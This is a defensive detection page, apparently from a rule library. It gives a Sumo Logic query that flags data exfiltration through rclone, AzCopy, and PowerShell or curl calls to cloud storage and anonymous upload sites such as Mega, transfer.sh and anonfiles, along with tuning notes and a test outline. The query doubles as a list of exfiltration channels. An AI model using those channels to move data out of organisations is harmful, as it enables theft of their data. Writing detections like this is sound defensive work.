THREAT-CloudStorage-DataExfil Sumo Logic CSE · Sumo

Detect Data Exfiltration via Cloud Storage Services in Sumo Logic CSE

Exfiltration of corporate data to attacker-controlled cloud storage is a dominant technique in double-extortion ransomware campaigns and espionage operations. Adversaries use legitimate cloud storage services (Mega, Dropbox, OneDrive, Box, Google Drive, rclone, AzCopy, ShareFile) to blend exfiltration traffic with normal business activity, bypassing egress monitoring that blocks unknown C2 IPs. Scattered Spider used Mega for SMB data exfiltration before ransomware deployment in 2024-2025. Akira and Black Basta affiliates use rclone with SFTP/cloud backends. Lazarus Group favors Dropbox and Google Drive. Key indicators: rclone.exe or azcopy.exe execution with external cloud endpoints, large outbound data transfers to cloud storage IPs, WinSCP or FileZilla used for bulk data staging, and PowerShell Invoke-WebRequest with cloud storage URLs. Detection opportunity exists in the staging phase (file collection before transfer) and the transfer phase (network and process telemetry).

MITRE ATT&CK

Tactic
Exfiltration

Sumo Detection Query

Sumo Logic CSE (Sumo)
sql 
(_sourceCategory="windows/sysmon" OR _sourceCategory="endpoint/windows/sysmon") EventCode=1
| where (Image matches "*rclone.exe")
    OR (Image matches "*azcopy.exe" AND (
        CommandLine matches "*blob.core.windows.net*"
        OR CommandLine matches "*file.core.windows.net*"
        OR CommandLine matches "*queue.core.windows.net*"
    ))
    OR (
        (Image matches "*powershell.exe" OR Image matches "*pwsh.exe"
            OR Image matches "*curl.exe" OR Image matches "*wscript.exe")
        AND (
            CommandLine matches "*mega.nz*"
            OR CommandLine matches "*mega.io*"
            OR CommandLine matches "*dropbox.com*"
            OR CommandLine matches "*dropboxapi.com*"
            OR CommandLine matches "*transfer.sh*"
            OR CommandLine matches "*gofile.io*"
            OR CommandLine matches "*box.com*"
            OR CommandLine matches "*box.net*"
            OR CommandLine matches "*drive.google.com*"
            OR CommandLine matches "*onedrive.live.com*"
            OR CommandLine matches "*sharefile.com*"
            OR CommandLine matches "*sendspace.com*"
            OR CommandLine matches "*filebin.net*"
            OR CommandLine matches "*anonfiles.com*"
        )
    )
| eval ThreatType = if(Image matches "*rclone*", "Exfil_Rclone",
    if(Image matches "*azcopy*", "Exfil_AzCopy", "Exfil_CloudStorage"))
| eval RiskScore = if(ThreatType == "Exfil_Rclone", 85,
    if(ThreatType == "Exfil_AzCopy", 80, 70))
| stats count AS Events, values(CommandLine) AS CommandLines, max(RiskScore) AS MaxRisk
    BY ComputerName, User, Image, ThreatType
| sort BY MaxRisk desc
high severity high confidence

Sumo Logic search query detecting cloud storage data exfiltration via Windows Sysmon process creation events (Event ID 1). Detects rclone.exe execution (Scattered Spider, Akira TTP), AzCopy with external Azure Blob/File storage endpoints, and PowerShell or curl invocations referencing cloud storage and anonymous upload services. Aggregates by host and user to surface repeated or campaign-level activity within the search window.

Data Sources

Sumo Logic Cloud SIEMWindows Sysmon (via Sumo Logic Installed Collector)Sumo Logic Endpoint Source

Required Tables

_sourceCategory=windows/sysmon

False Positives & Tuning

  • Approved IT backup or archival jobs: rclone scheduled tasks run under a service account for authorized cloud-to-cloud archival — suppress by adding the backup service account username to a Sumo Logic lookup table and filtering it from results with a join or where clause
  • Development and test environments: AzCopy used interactively by developers targeting Azure dev/staging storage accounts — maintain a Sumo Logic lookup of non-production storage account subdomains and exclude matching CommandLine values to avoid alert fatigue
  • Sanctioned cloud productivity tools: corporate Dropbox Business or Box Enterprise background sync processes generating recurring process creation events — baseline per-user event frequency with a timeslice comparison and alert only on deviations of 3x or more above the 30-day average
Download portable Sigma rule (.yml)

Other platforms for THREAT-CloudStorage-DataExfil

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) IBM QRadar (QRadar) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 1 adversary technique from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Cloud Exfiltration via rclone to Mega

    Expected signal: Sysmon Event ID 1: rclone.exe with copy command targeting mega remote. Sysmon Event ID 3: network connection to mega.co.nz or api.mega.co.nz.

Last updated: 2026-04-24 Research depth: deep
References (5)

Unlock Pro Content

Get the full detection package for THREAT-CloudStorage-DataExfil including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1567.002Exfiltration to Cloud Storage

Related Techniques

T1567.002Exfiltration to Cloud StorageT1048Exfiltration Over Alternative ProtocolT1005Data from Local SystemT1039Data from Network Shared DriveT1486Data Encrypted for Impact

Same Tactic: Exfiltration

Popular Detections